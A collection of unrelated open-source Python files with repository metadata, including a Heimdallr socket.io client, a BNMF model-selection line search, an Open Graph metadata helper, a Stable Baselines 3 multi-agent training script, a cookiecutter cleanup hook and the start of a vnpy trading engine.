        if isinstance(event, _Event) and event.is_set():
            return True
        return parent_says_stop
class Client():
    """
    The ``Client`` class provides most of the behavior for
    Heimdallr clients. However, it is not intended to be
    used directly. The ``Client`` constructor creates the
    basic connection which in this case is a
    ``SocketIONamespace``. It sets up callbacks for
    connection and authentication as well as a default
    callback for errors. The default error handler can be
    removed by ``client.remove_listener('err')``.

    Args:
        token (str): Authentication token
    """
    # Class-level configuration; subclasses override _namespace.
    _url = URL
    _auth_source = AUTH_SOURCE
    _namespace = '/'
    # When _safe is True, send/connect failures are printed, not raised.
    _safe = True

    def __init__(self, token):
        self.ready = False
        self.ready_callbacks = []
        self.callbacks = {}
        self.token = token
        self.connection = SocketIONamespace(None, self._namespace)

        # Handle sending packets asynchronously
        self._emit_queue = Queue()
        self._emit_worker = Thread(target=self._emit_task)
        self._emit_worker.daemon = True
        self._emit_worker.start()

        # Capture the original emit so safe_emit can delegate to it even
        # after self.connection.emit has been replaced below.
        emit = self.connection.emit

        def safe_emit(*args, **kwargs):
            try:
                emit(*args, **kwargs)
            except Exception as e:
                print (
                    'HeimdallrClient failed to send. Original exception: %s'
                    % e.message
                )

        if self._safe:
            self.connection.emit = safe_emit

        # Default error handler; can be removed via remove_listener('err').
        @self.on('err')
        def fn(err):
            if 'message' in err:
                raise HeimdallrClientException(err['message'])
            else:
                raise HeimdallrClientException(err)

        # After authentication succeeds, flush any callbacks queued while
        # the client was not yet ready (see on_ready-decorated subclasses).
        @self.on('auth-success')
        def fn(*args):
            self.ready = True
            while self.ready_callbacks:
                self.ready_callbacks.pop(0)()

        # (Re)authorize on every connect, including reconnects.
        def on_connect(*args):
            self._emit_queue.put((
                'authorize',
                {'token': self.token, 'authSource': self._auth_source}
            ))

        self.on('connect', on_connect)
        self.on('reconnect', on_connect)

    def __del__(self):
        # Cleanup thread
        # NOTE: uses the private Thread stop API (Python 2 only).
        self._emit_worker._Thread__stop()

    def connect(self, **kwargs):
        """ Connect to the Heimdallr server.

        The ``connect`` method blocks until the the socket connection
        to the server has been established.

        Args:
            **kwargs: Passed to underlying SocketIO constructor

        :returns: :class:`Client <Client>`
        """
        try:
            parsed = urlparse(self._url)
            # Drop any previous live connection before replacing it.
            if self.connection._io and self.connection._io.connected:
                self.connection.disconnect()
            self.connection._io = _SocketIO(
                '%s://%s' % (parsed.scheme, parsed.hostname),
                parsed.port,
                **kwargs
            )
            # Wire the namespace into the new socket and block until the
            # connect handshake completes.
            io = self.connection._io
            io._namespace = self.connection
            io._namespace_by_path[self._namespace] = self.connection
            io.connect(self._namespace)
            io.wait(for_connect=True)
        except Exception as e:
            if not self._safe:
                raise e
            print 'HeimdallrClient failed to connect: %s' % e.message

        return self

    def run(self, seconds=None, **kwargs):
        """ Main loop for a client.

        The ``run`` method is the main loop for a client and is where
        all communication between the Heimdallr server and client
        takes place. The ``run`` method is just a proxy for the
        ``SocketIO.wait`` method so you can call it with the
        same arguments. However, an additional ``event`` option has
        been added. If a :py:class:`threading.Event` object is passed in for
        ``event``, the wait loop will terminate once the flag is set.

        Args:
            seconds (float): Number of seconds to loop for
            event (:py:class:`threading.Event`): Triggers the exit of the run
                loop when the flag is set
            for_connect (bool): Run until the SocketIO connect event
            for_callback (bool): Run until the server has acknowledged all
                emits

        :returns: :class:`Client <Client>`

        **Usage:**

        .. code-block:: python

            client.run(1) # Loops for 1 second

            from threading import Event
            event = Event()
            client.run(event=event) # Loops until event.is_set() is True

            client.run() # Loops forever
        """
        kwargs['seconds'] = seconds
        self.connection._io.wait(**kwargs)
        return self

    def _emit_task(self):
        # Daemon-thread loop: drain the emit queue forever, sending each
        # queued (message, payload) pair over the socket.
        while True:
            args = self._emit_queue.get()
            self.connection.emit(*args)

    def __trigger_callbacks(self, message_name, *args):
        """ Call all of the callbacks for a socket.io message.

        A version of this method curried with ``message_name``
        is given to the underlying ``SocketIONamespace``. When the
        ``SocketIONamespace`` calls it each of the callbacks that
        have been attached to ``message_name`` will be called.

        Args:
            message_name (str): Name of the socket.io message to listen for
            args: Data sent with message
        """
        callbacks = self.callbacks.get(message_name, [])
        for callback in callbacks:
            callback(*args)

    def __on(self, message_name, callback):
        """ Store ``callback`` and register a placeholder callback.

        Appends ``callback`` to the list of callbacks for the
        given ``message_name``. Also assigns a placeholder
        callback to the underlying ``SocketIONamespace`` so that
        the placeholder can call all of the callbacks in
        the list.

        Args:
            message_name (str): Name of the socket.io message to listen for
            callback (function): Callback to be run when the socket.io message
                is heard
        """
        self.callbacks.setdefault(message_name, [])
        self.callbacks[message_name].append(callback)
        self.connection.on(
            message_name,
            partial(self.__trigger_callbacks, message_name)
        )

    def on(self, message_name, callback=None):
        """ Add a socket.io message listener.

        The ``on`` method will add a callback for socket.io messages
        of the specified message name. Multiple callbacks can be
        added for the same message name. They will be triggered
        in the order in which they were added. This method can be
        called outright or it can be used as a decorator.

        Args:
            message_name (str): Name of the socket.io message to listen for
            callback (function): Callback to run when the socket.io
                message is heard

        :returns: :class:`Client <Client>`

        **Usage:**

        .. code-block:: python

            def first(*args):
                print 'FIRST'
            client.on('myMessage', first)

            @client.on('myMessage')
            def second(*args):
                print 'SECOND'
        """
        # Decorator syntax
        if callback is None:
            def decorator(fn):
                self.__on(message_name, fn)
            return decorator

        # SocketIO-Client syntax
        self.__on(message_name, callback)
        return self

    def remove_listener(self, message_name, callback=None):
        """ Remove listener for socket.io message.

        If ``callback`` is specified, only the callbacks registered
        for ``message_name`` that match ``callback`` will be removed.
        If only ``message_name`` is specified, all of the callbacks
        will be removed.

        Args:
            message_name (str): Name of the socket.io message to remove
            callback (function): Specific callback to remove

        :returns: :class:`Client <Client>`
        """
        if callback:
            # Remove every registration of this callback (it may have been
            # added more than once).
            while callback in self.callbacks.get(message_name, []):
                self.callbacks[message_name].remove(callback)
        else:
            # Drop our list and the underlying namespace's dispatcher entry.
            self.callbacks.pop(message_name, None)
            self.connection._callback_by_event.pop(message_name, None)

        return self
@for_own_methods(on_ready)
class Provider(Client):
    """
    This class should be used to create a Heimdallr provider.
    It inherits most of its functionality but it also
    automatically connects to the provider namespace and
    provides some convenience functions.
    """
    _namespace = '/provider'

    def send_event(self, subtype, data=None):
        """ Emit a Heimdallr event packet.

        This will send a Heimdallr event packet to the
        Heimdallr server where it will be rebroadcast.
        ``data`` must adhere to the provider's schema for
        the given ``subtype``.

        Args:
            subtype (str): The event packet subtype
            data: The event packet data

        :returns: :class:`Provider <Provider>`
        """
        self._emit_queue.put((
            'event',
            {'subtype': subtype, 'data': data, 't': timestamp()}
        ))
        # BUG FIX: the docstring promises a Provider return for chaining,
        # but the method previously returned None.
        return self

    def send_sensor(self, subtype, data=None):
        """ Emit a Heimdallr sensor packet.

        This will send a Heimdallr sensor packet to the
        Heimdallr server where it will be rebroadcast.
        ``data`` must adhere to the provider's schema for
        the given ``subtype``.

        Args:
            subtype (str): The sensor packet subtype
            data: The sensor packet data

        :returns: :class:`Provider <Provider>`
        """
        self._emit_queue.put((
            'sensor',
            {'subtype': subtype, 'data': data, 't': timestamp()}
        ))
        return self

    def send_stream(self, data):
        """ Send binary data to the Heimdallr server.

        This should only be used when the Heimdallr server
        has issued a ``{'stream': 'start'}`` control packet
        and should stop being used when the Heimdallr
        server issues a ``{'stream': 'stop'}`` control
        packet.

        Args:
            data: The binary data to be sent.

        :returns: :class:`Provider <Provider>`
        """
        self._emit_queue.put((
            'stream',
            bytearray(data)
        ))
        return self

    def completed(self, uuid):
        """ Signal the Heimdallr server that a control has been completed.

        This should be used when a control that has a persistent
        field set to ``uuid`` has been completed.

        Args:
            uuid (str): UUID of the persistent control packet that has been
                completed

        :returns: :class:`Provider <Provider>`
        """
        self._emit_queue.put((
            'event',
            {'subtype': 'completed', 'data': uuid, 't': timestamp()}
        ))
        return self
@for_own_methods(on_ready)
class Consumer(Client):
    """
    This class should be used to create a Heimdallr consumer.
    It inherits most of its functionality but it also
    automatically connects to the consumer namespace and
    provides some convenience functions.
    """
    # Socket.IO namespace joined on connect (consumed by the Client base).
    _namespace = '/consumer'
    def send_control(self, uuid, subtype, data=None, persistent=False):
        """ Emit a Heimdallr control packet.
        This will send a control to the provider specified by
        ``uuid``. ``data`` must adhere to the provider's schema
        for the given ``subtype``. If `persistent` is ``True``,
        the control packet will be sent immediately and then
        again every time the provider connects until the
        provider signals the Heimdallr server that it has
        completed the control.
        Args:
            uuid (str): UUID of the provider to send the control packet to
            subtype (str): The control packet subtype
            data: The control packet data
            persistent (bool): Whether or not the control should persist
        :returns: :class:`Consumer <Consumer>`
        """
        # Packets are queued and emitted asynchronously by the Client machinery,
        # not sent inline here.
        self._emit_queue.put((
            'control',
            {
                'provider': uuid,
                'subtype': subtype,
                'data': data,
                'persistent': persistent
            }
        ))
    def subscribe(self, uuid):
        """ Subscribe to a provider.
        A consumer must subscribe to a provider before it
        receives event or sensor packets from the provider
        or can send control packets to the provider.
        Args:
            uuid (str): UUID of the provider to subscribe to
        :returns: :class:`Consumer <Consumer>`
        """
        self._emit_queue.put((
            'subscribe',
            {'provider': uuid}
        ))
    def unsubscribe(self, uuid):
        """ Unsubscribe from a provider.
        The consumer will no longer receive packets from the
        provider or be able to send it controls. This will
        be done automatically by the Heimdallr server on
        disconnect.
        Args:
            uuid (str): UUID of the provider to unsubscribe from
        :returns: :class:`Consumer <Consumer>`
        """
        self._emit_queue.put((
            'unsubscribe',
            {'provider': uuid}
        ))
    def set_filter(self, uuid, filter_):
        """ Control which event and sensor subtypes to hear from provider.
        Set which packet subtypes you want to hear from the provider.
        `filter_` should be a dictionary with the keys `event` and/or
        `sensor`. The value of those fields should be an array of
        strings of the subtypes that you want to hear for the
        provider given by `uuid`.
        Args:
            uuid (str): UUID of the provider to filter packets from
            filter_ (dict): Dictionary containing event and/or sensor packet
                subtypes that you want to receive
        :returns: :class:`Consumer <Consumer>`
        """
        # NOTE: mutates the caller's dict by injecting the provider UUID.
        filter_['provider'] = uuid
        self._emit_queue.put((
            'setFilter',
            filter_
        ))
    def get_state(self, uuid, subtypes):
        """ Get the current state of a provider.
        For each event packet subtype in `subtypes`, the most recent
        event packet of that subtype will be sent to the consumer by
        the Heimdallr server.
        Args:
            uuid (str): UUID of the provider to get the state of
            subtypes (list): Event subtypes to get the state of
        :returns: :class:`Consumer <Consumer>`
        """
        self._emit_queue.put((
            'getState',
            {'provider': uuid, 'subtypes': subtypes}
        ))
    def join_stream(self, uuid):
        """ Join binary data stream from a provider.
        If this is the first consumer to join the stream of
        a provider, the Heimdallr server will send a
        ``{'stream': 'start'}`` control packet to the provider.
        Args:
            uuid (str): UUID of the provider to join the stream of
        :returns: :class:`Consumer <Consumer>`
        """
        self._emit_queue.put((
            'joinStream',
            {'provider': uuid}
        ))
    def leave_stream(self, uuid):
        """ Leave binary data stream for a provider.
        If this is the last consumer to leave the stream for a
        provider the Heimdallr server will send a
        ``{'stream': 'stop'}`` control packet to the provider.
        This will be done automatically by the Heimdallr server
        on disconnect.
        Args:
            uuid (str): UUID of the provider to leave the stream of
        :returns: :class:`Consumer <Consumer>`
        """
        self._emit_queue.put((
            'leaveStream',
            {'provider': uuid}
        )) | {
"content_hash": "c1357c0580f28fcc23691a5606eebcb2",
"timestamp": "",
"source": "github",
"line_count": 536,
"max_line_length": 78,
"avg_line_length": 30.94776119402985,
"alnum_prop": 0.5775862068965517,
"repo_name": "ElementRobot/py-heimdallr-client",
"id": "5c94f39e8ab9a11719332ed96050488fd831080a",
"size": "16588",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "heimdallr_client/clients.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "3794"
},
{
"name": "Python",
"bytes": "30804"
}
],
"symlink_target": ""
} |
"""
Class for doing model selection for BNMF, minimising the BIC, AIC, or MSE.
We expect the following arguments:
- classifier - a class for BNMF, with methods:
__init__(R,M,K,priors),
initialise(initUV),
run(iterations),
quality(metric) - metric in ['AIC','BIC','loglikelihood','MSE']
or quality(metric,burn_in,thinning) for Gibbs
- values_K - a list of values for K
- R - the dataset
- M - the mask matrix
- prior - the prior values for BNMF. This should be a dictionary of the form:
{ 'alpha':alpha, 'beta':beta, 'lambdaU':lambdaU, 'lambdaV':lambdaV }
where lambdaU and lambdaV are a single value.
- initUV - the initialisation of U and V - either 'exp' or 'random'
- iterations - number of iterations to run
- restarts - we run the classifier this many times and use the one with
the highest log likelihood
The line search can be started by running search().
If we use Gibbs then we run search(burn_in=<>,thinning=<>).
If we use ICM then we run search(minimum_TN=<>).
After that, the values for each metric ('BIC','AIC','loglikelihood','MSE') can
be obtained using all_values(metric), and the best value of K can be returned
using best_value(metric).
"""
metrics = ['BIC','AIC','loglikelihood','MSE','ELBO']
class LineSearch:
    """Line search over the values in values_K, fitting BNMF for each K and
    recording every quality metric for the best restart.

    NOTE: this module uses Python 2 print statements.
    """
    def __init__(self,classifier,values_K,R,M,priors,initUV,iterations,restarts=1):
        self.classifier = classifier
        self.values_K = values_K
        self.R = R
        self.M = M
        (self.I,self.J) = self.R.shape
        self.priors = priors
        self.initUV = initUV
        self.iterations = iterations
        self.restarts = restarts
        assert self.restarts > 0, "Need at least 1 restart."
        # One list of scores per metric, appended in the order of values_K.
        self.all_performances = {
            metric : []
            for metric in metrics
        }
    def search(self,burn_in=None,thinning=None,minimum_TN=None):
        """Run the line search. Pass burn_in/thinning for Gibbs samplers,
        minimum_TN for ICM (see the module docstring)."""
        for K in self.values_K:
            print "Running line search for BNMF. Trying K = %s." % K
            best_BNMF = None
            for r in range(0,self.restarts):
                print "Restart %s for K = %s." % (r+1,K)
                BNMF = self.classifier(self.R,self.M,K,self.priors)
                BNMF.initialise(init=self.initUV)
                if minimum_TN is None:
                    BNMF.run(iterations=self.iterations)
                else:
                    BNMF.run(iterations=self.iterations,minimum_TN=minimum_TN)
                # Keep the restart with the highest log likelihood.
                args = {'metric':'loglikelihood'}
                if burn_in is not None and thinning is not None:
                    args['burn_in'], args['thinning'] = burn_in, thinning
                if best_BNMF is None or BNMF.quality(**args) > best_BNMF.quality(**args):
                    best_BNMF = BNMF
            # Record every metric for the best restart at this K.
            for metric in metrics:
                if burn_in is not None and thinning is not None:
                    quality = best_BNMF.quality(metric,burn_in,thinning)
                else:
                    quality = best_BNMF.quality(metric)
                self.all_performances[metric].append(quality)
        print "Finished running line search for BNMF."
    def all_values(self,metric):
        """Return the list of recorded values of *metric*, one per K."""
        assert metric in metrics, "Unrecognised metric name: %s." % metric
        return self.all_performances[metric]
    def best_value(self,metric):
        """Return the K whose recorded *metric* value is smallest.
        NOTE(review): min is applied to every metric, including
        loglikelihood/ELBO where larger is usually better -- confirm intended."""
        assert metric in metrics, "Unrecognised metric name: %s." % metric
        return self.values_K[self.all_values(metric).index(min(self.all_values(metric)))] | {
"content_hash": "4f07d2c6825a23e92a63359c9be10a7b",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 91,
"avg_line_length": 41.87640449438202,
"alnum_prop": 0.567748859672659,
"repo_name": "ThomasBrouwer/BNMTF",
"id": "22d23e1a78daa3c09758174956d8a0d6c52415a2",
"size": "3727",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/cross_validation/line_search_bnmf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Matlab",
"bytes": "29924"
},
{
"name": "Python",
"bytes": "2751547"
},
{
"name": "R",
"bytes": "41465"
}
],
"symlink_target": ""
} |
from storm.locals import *
from mdcorpus.orm import *
from mdcorpus.parser import *
parser = Parser()

# Parse each line of the sample file and wrap the last parsed URL entry
# in a RawScriptUrl ORM object.
# BUG FIX: the original called "f.close" without parentheses, so the file
# handle was never actually closed; the with-block guarantees closure.
# The local previously named "list" shadowed the builtin and was renamed.
with open("sample_raw_script_urls.txt") as f:
    for line in f:
        print("=== parse this line ===")
        print(line)
        fields = parser.raw_script_urls(line)
        script_url = RawScriptUrl(fields[-1])
        print(script_url.url)
        print("")
| {
"content_hash": "6c814ef43f0d9795871a7d4bc2acb73d",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 39,
"avg_line_length": 20.944444444444443,
"alnum_prop": 0.6578249336870027,
"repo_name": "sosuke-k/cornel-movie-dialogs-corpus-storm",
"id": "ba45f34e58d11b0ef63ac32bbb25f50bf44c092f",
"size": "425",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mdcorpus/examples/parse_raw_script_url.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "29452"
},
{
"name": "Shell",
"bytes": "77"
}
],
"symlink_target": ""
} |
# Registry mapping an Open Graph type name (e.g. 'website') to a handler
# instance; populated by the @ogp_type decorator below.
ogp_types = {}


def ogp_type(cls):
    """Class decorator: register an instance of *cls* in ``ogp_types``
    under the class name lowercased, and return the class unchanged.
    (Renamed the local from ``type``, which shadowed the builtin.)
    """
    type_name = cls.__name__.lower()
    ogp_types[type_name] = cls()
    return cls
class OGP:
    """Context manager that adds Open Graph ``og:type`` metadata and the
    matching RDFa ``prefix`` attribute to a document.

    On entry it reads the document's ``og`` meta namespace; on clean exit
    it writes the accumulated prefixes to the document's ``prefix`` attr.
    """

    def __init__(self, doc):
        self.doc = doc
        self.prefixes = []
        og = doc.meta.namespaces.get('og')
        if og:
            og_type = og.get('type')
            if og_type:
                self.add_type(og_type)

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Only write the prefix attribute when no exception occurred and at
        # least one prefix was registered.
        if not exc_type and self.prefixes:
            prefix = ' '.join(self.prefixes)
            self.doc.attr('prefix', prefix)

    def add_type(self, type):
        """Register OGP *type* on the document (meta tag + prefix + handler)."""
        prefix = 'og: http://ogp.me/ns#'
        # BUG FIX: the original used ``type is not 'website'`` -- an identity
        # comparison against a str literal, which is implementation-defined
        # (and a SyntaxWarning on modern CPython). Use value inequality.
        if type != 'website':
            bits = type.split('.')
            if not self.prefixes:
                self.prefixes.append(prefix)
            # Non-website types get their own namespace, e.g. ``article:``.
            prefix = '{0}: http://ogp.me/ns/{0}#'.format(bits[0])
        if prefix not in self.prefixes:
            type_handler = ogp_types.get(type)
            if type_handler:
                self.doc.head.add_meta(property='og:type', content=type)
                self.prefixes.append(prefix)
                type_handler(self.doc)
class OGPType:
    """Base handler for one Open Graph type; subclasses override __call__
    to write their type-specific ``og:*`` meta tags."""

    def __call__(self, doc):
        pass

    def set(self, doc, key, tag_key=None, array=False):
        """Copy one value from the document's meta data into ``og:<key>``
        meta tags, falling back to the plain meta tag *tag_key* and
        splitting comma-separated values when *array* is true.
        """
        value = doc.meta.namespaces['og'].get(key)
        if not value and tag_key:
            value = doc.meta.get(tag_key)
        if value and array:
            value = value.split(', ')
        if not value:
            return
        key = 'og:%s' % key
        values = value if isinstance(value, (tuple, list)) else (value,)
        if not array:
            # Scalar keys only ever emit a single meta tag.
            values = values[:1]
        for item in values:
            doc.head.add_meta(property=key, content=item)
@ogp_type
class Website(OGPType):
    """Handler for the default 'website' OGP type: the base metadata keys."""

    def __call__(self, doc):
        # (og key, fallback meta tag) pairs, emitted in OGP's canonical order.
        for args in (('url',), ('title', 'title'),
                     ('description', 'description'),
                     ('locale',), ('site_name',)):
            self.set(doc, *args)
        self.set(doc, 'image', array=True)
@ogp_type
class Profile(Website):
    """Handler for the OGP 'profile' type: website keys plus person fields."""

    def __call__(self, doc):
        super().__call__(doc)
        for key in ('first_name', 'last_name', 'username', 'gender'):
            self.set(doc, key)
@ogp_type
class Article(Website):
    """Handler for the OGP 'article' type: website keys plus article fields."""

    def __call__(self, doc):
        super().__call__(doc)
        for key in ('published_time', 'modified_time', 'expiration_time'):
            self.set(doc, key)
        self.set(doc, 'author', tag_key='author', array=True)
        self.set(doc, 'section')
        self.set(doc, 'tag', tag_key='keywords', array=True)
| {
"content_hash": "c205afd2912c6ac43aedbc52419b5d67",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 72,
"avg_line_length": 26.76,
"alnum_prop": 0.5115844544095666,
"repo_name": "quantmind/lux",
"id": "ab9b3f50aaf6fca151ff7827d3c24668c1bcad6a",
"size": "2677",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lux/ext/oauth/ogp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "906"
},
{
"name": "HTML",
"bytes": "5107"
},
{
"name": "JavaScript",
"bytes": "219127"
},
{
"name": "Makefile",
"bytes": "422"
},
{
"name": "Mako",
"bytes": "1050"
},
{
"name": "PLpgSQL",
"bytes": "140"
},
{
"name": "Python",
"bytes": "615221"
},
{
"name": "Shell",
"bytes": "196"
}
],
"symlink_target": ""
} |
"""Binary to run Stable Baselines 3 agents on meltingpot substrates."""
import gym
import stable_baselines3
from stable_baselines3.common import callbacks
from stable_baselines3.common import torch_layers
from stable_baselines3.common import vec_env
import supersuit as ss
import torch
from torch import nn
import torch.nn.functional as F
from examples.pettingzoo import utils
from meltingpot.python import substrate
device = torch.device("cuda") if torch.cuda.is_available() else torch.device(
"cpu")
# Use this with lambda wrapper returning observations only
class CustomCNN(torch_layers.BaseFeaturesExtractor):
  """Custom CNN feature extractor for frame-stacked RGB observations."""

  def __init__(
      self,
      observation_space: gym.spaces.Box,
      features_dim=128,
      num_frames=6,
      fcnet_hiddens=(1024, 128),
  ):
    """Construct a custom CNN feature extractor.

    Args:
      observation_space: the observation space as a gym.Space
      features_dim: Number of features extracted. This corresponds to the
        number of units in the last layer.
      num_frames: The number of (consecutive) frames to feed into the network.
      fcnet_hiddens: Sizes of the two fully-connected hidden layers.
    """
    # Python 3 zero-argument super() (the file already targets Python 3).
    super().__init__(observation_space, features_dim)
    # We assume CxHxW images (channels first);
    # re-ordering is done by pre-processing or a wrapper.
    # Each stacked frame contributes 3 (RGB) input channels.
    self.conv = nn.Sequential(
        nn.Conv2d(
            num_frames * 3, num_frames * 3, kernel_size=8, stride=4, padding=0),
        nn.ReLU(),  # 18 * 21 * 21
        nn.Conv2d(
            num_frames * 3, num_frames * 6, kernel_size=5, stride=2, padding=0),
        nn.ReLU(),  # 36 * 9 * 9
        nn.Conv2d(
            num_frames * 6, num_frames * 6, kernel_size=3, stride=1, padding=0),
        nn.ReLU(),  # 36 * 7 * 7
        nn.Flatten(),
    )
    # Flattened size of the final conv output for the spatial sizes noted in
    # the comments above.
    flat_out = num_frames * 6 * 7 * 7
    self.fc1 = nn.Linear(in_features=flat_out, out_features=fcnet_hiddens[0])
    self.fc2 = nn.Linear(
        in_features=fcnet_hiddens[0], out_features=fcnet_hiddens[1])

  def forward(self, observations) -> torch.Tensor:
    """Map a batch of B x H x W x C observations to feature vectors."""
    # Convert from B x H x W x C to B x C x H x W for Conv2d.
    # NOTE(review): contrary to the previous comment, no rescaling to [0, 1]
    # happens here -- presumably handled by a wrapper; confirm upstream.
    observations = observations.permute(0, 3, 1, 2)
    features = self.conv(observations)
    features = F.relu(self.fc1(features))
    features = F.relu(self.fc2(features))
    return features
def main():
  """Train a parameter-shared PPO agent on commons_harvest_open with SB3."""
  # Config
  env_name = "commons_harvest_open"
  env_config = substrate.get_config(env_name)
  # This first env is only used to read max_num_agents; the training env is
  # rebuilt below with the wrapper stack.
  env = utils.parallel_env(env_config)
  rollout_len = 1000
  total_timesteps = 2000000
  num_agents = env.max_num_agents
  # Training
  num_cpus = 1  # number of cpus
  num_envs = 1  # number of parallel multi-agent environments
  # number of frames to stack together; use >4 to avoid automatic
  # VecTransposeImage
  num_frames = 4
  # output layer of cnn extractor AND shared layer for policy and value
  # functions
  features_dim = 128
  fcnet_hiddens = [1024, 128]  # Two hidden layers for cnn extractor
  ent_coef = 0.001  # entropy coefficient in loss
  batch_size = (rollout_len * num_envs // 2
               )  # This is from the rllib baseline implementation
  lr = 0.0001
  n_epochs = 30
  gae_lambda = 1.0
  gamma = 0.99
  target_kl = 0.01
  grad_clip = 40
  verbose = 3
  model_path = None  # Replace this with a saved model
  # Training env: extract RGB, stack frames, flatten the multi-agent env into
  # a vectorized single-agent view, then monitor and channel-first transpose.
  env = utils.parallel_env(
      max_cycles=rollout_len,
      env_config=env_config,
  )
  env = ss.observation_lambda_v0(env, lambda x, _: x["RGB"], lambda s: s["RGB"])
  env = ss.frame_stack_v1(env, num_frames)
  env = ss.pettingzoo_env_to_vec_env_v1(env)
  env = ss.concat_vec_envs_v1(
      env,
      num_vec_envs=num_envs,
      num_cpus=num_cpus,
      base_class="stable_baselines3")
  env = vec_env.VecMonitor(env)
  env = vec_env.VecTransposeImage(env, True)
  # Evaluation env: same wrapper stack, single vectorized copy.
  eval_env = utils.parallel_env(
      max_cycles=rollout_len,
      env_config=env_config,
  )
  eval_env = ss.observation_lambda_v0(eval_env, lambda x, _: x["RGB"],
                                      lambda s: s["RGB"])
  eval_env = ss.frame_stack_v1(eval_env, num_frames)
  eval_env = ss.pettingzoo_env_to_vec_env_v1(eval_env)
  eval_env = ss.concat_vec_envs_v1(
      eval_env, num_vec_envs=1, num_cpus=1, base_class="stable_baselines3")
  eval_env = vec_env.VecMonitor(eval_env)
  eval_env = vec_env.VecTransposeImage(eval_env, True)
  # Evaluate roughly every 100k env steps, adjusted for vectorization.
  eval_freq = 100000 // (num_envs * num_agents)
  policy_kwargs = dict(
      features_extractor_class=CustomCNN,
      features_extractor_kwargs=dict(
          features_dim=features_dim,
          num_frames=num_frames,
          fcnet_hiddens=fcnet_hiddens,
      ),
      net_arch=[features_dim],
  )
  tensorboard_log = "./results/sb3/harvest_open_ppo_paramsharing"
  model = stable_baselines3.PPO(
      "CnnPolicy",
      env=env,
      learning_rate=lr,
      n_steps=rollout_len,
      batch_size=batch_size,
      n_epochs=n_epochs,
      gamma=gamma,
      gae_lambda=gae_lambda,
      ent_coef=ent_coef,
      max_grad_norm=grad_clip,
      target_kl=target_kl,
      policy_kwargs=policy_kwargs,
      tensorboard_log=tensorboard_log,
      verbose=verbose,
  )
  # Optionally resume from a saved checkpoint.
  if model_path is not None:
    model = stable_baselines3.PPO.load(model_path, env=env)
  eval_callback = callbacks.EvalCallback(
      eval_env, eval_freq=eval_freq, best_model_save_path=tensorboard_log)
  model.learn(total_timesteps=total_timesteps, callback=eval_callback)
  # Save the final model next to the tensorboard logs and verify it reloads.
  logdir = model.logger.dir
  model.save(logdir + "/model")
  del model
  model = stable_baselines3.PPO.load(logdir + "/model")  # noqa: F841
# Script entry point.
if __name__ == "__main__":
  main()
| {
"content_hash": "80601800445787b43c859ee1e31e19a5",
"timestamp": "",
"source": "github",
"line_count": 172,
"max_line_length": 80,
"avg_line_length": 32.53488372093023,
"alnum_prop": 0.6561829878484632,
"repo_name": "deepmind/meltingpot",
"id": "8f5d56e7347cf1b503cd3c61f335bf9d1ceed18a",
"size": "6191",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "examples/pettingzoo/sb3_train.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1732"
},
{
"name": "Lua",
"bytes": "674594"
},
{
"name": "Python",
"bytes": "1768669"
},
{
"name": "Shell",
"bytes": "2923"
}
],
"symlink_target": ""
} |
"""Removed unused files."""
import os
PROJECT_DIRECTORY = os.path.realpath(os.path.curdir)
def remove_file(file_name):
    """Delete *file_name* when it is present; do nothing otherwise."""
    file_is_present = os.path.exists(file_name)
    if file_is_present:
        os.remove(file_name)
# Post-generation cleanup: prune the optional integration files the user
# declined. The '{{ cookiecutter.* }}' placeholders are rendered by
# cookiecutter before this hook runs, so the comparisons see real answers.
if '{{ cookiecutter.use_travis }}'.lower() != 'y':
    remove_file(os.path.join(PROJECT_DIRECTORY, '.travis.yml'))
if '{{ cookiecutter.use_aws_codedeploy }}'.lower() != 'y':
    remove_file(os.path.join(PROJECT_DIRECTORY, 'appspec.yml'))
| {
"content_hash": "202d416f95feeea8c8029e3694dfc637",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 63,
"avg_line_length": 28,
"alnum_prop": 0.6540178571428571,
"repo_name": "inventivehack/cookiecutter-django-ihk",
"id": "678b05b92f464825d47a2e28871a74cc5b1b1344",
"size": "473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hooks/post_gen_project.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Nginx",
"bytes": "1194"
},
{
"name": "Python",
"bytes": "7119"
},
{
"name": "Ruby",
"bytes": "571"
},
{
"name": "Shell",
"bytes": "2717"
}
],
"symlink_target": ""
} |
from __future__ import division
import os
import shelve
import logging
from collections import OrderedDict
from datetime import datetime
from copy import copy
from pymongo import MongoClient, ASCENDING
from pymongo.errors import ConnectionFailure
from vnpy.event import Event
from vnpy.trader.vtGlobal import globalSetting
from vnpy.trader.vtEvent import *
from vnpy.trader.vtGateway import *
from vnpy.trader.language import text
from vnpy.trader.vtFunction import getTempPath
########################################################################
class MainEngine(object):
    """Main engine: wires together the event engine, data engine, trading
    gateways, application modules and the MongoDB connection.
    (Comments translated from Chinese.)"""
    #----------------------------------------------------------------------
    def __init__(self, eventEngine):
        """Constructor"""
        # Record today's date (used as the MongoDB log collection name)
        self.todayDate = datetime.now().strftime('%Y%m%d')
        # Bind and start the event engine
        self.eventEngine = eventEngine
        self.eventEngine.start()
        # Create the data engine
        self.dataEngine = DataEngine(self.eventEngine)
        # MongoDB related
        self.dbClient = None    # MongoDB client object
        # Gateway instances
        self.gatewayDict = OrderedDict()
        self.gatewayDetailList = []
        # Application module instances
        self.appDict = OrderedDict()
        self.appDetailList = []
        # Risk-management engine instance (special standalone object)
        self.rmEngine = None
        # Log engine instance
        self.logEngine = None
        self.initLogEngine()
    #----------------------------------------------------------------------
    def addGateway(self, gatewayModule):
        """Add a low-level trading gateway."""
        gatewayName = gatewayModule.gatewayName
